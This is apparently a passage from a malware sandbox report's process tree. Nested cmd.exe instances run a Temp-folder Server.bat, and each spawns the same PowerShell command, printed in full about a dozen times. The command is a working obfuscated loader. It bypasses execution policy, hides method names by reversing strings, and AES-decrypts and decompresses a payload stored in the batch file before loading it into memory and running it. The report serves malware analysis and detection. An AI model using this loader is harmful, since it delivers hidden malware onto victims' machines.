        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        85⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2988
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        83⤵
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        84⤵
        
        PID:2608
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        82⤵
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        83⤵
        
        PID:1836
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        81⤵
        
        PID:1644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        82⤵
        
        PID:1508
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        80⤵
        
        PID:1020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        81⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        79⤵
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        80⤵
        
        PID:1480
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        78⤵
        
        PID:3032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        79⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2488
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        77⤵
        
        PID:1636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        78⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2452
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        76⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        77⤵
        
        PID:2564
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        75⤵
        
        PID:892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        76⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1976
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        74⤵
        
        PID:1040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        75⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:748
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        73⤵
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        74⤵
        
        PID:1780
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        72⤵
        
        PID:904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ 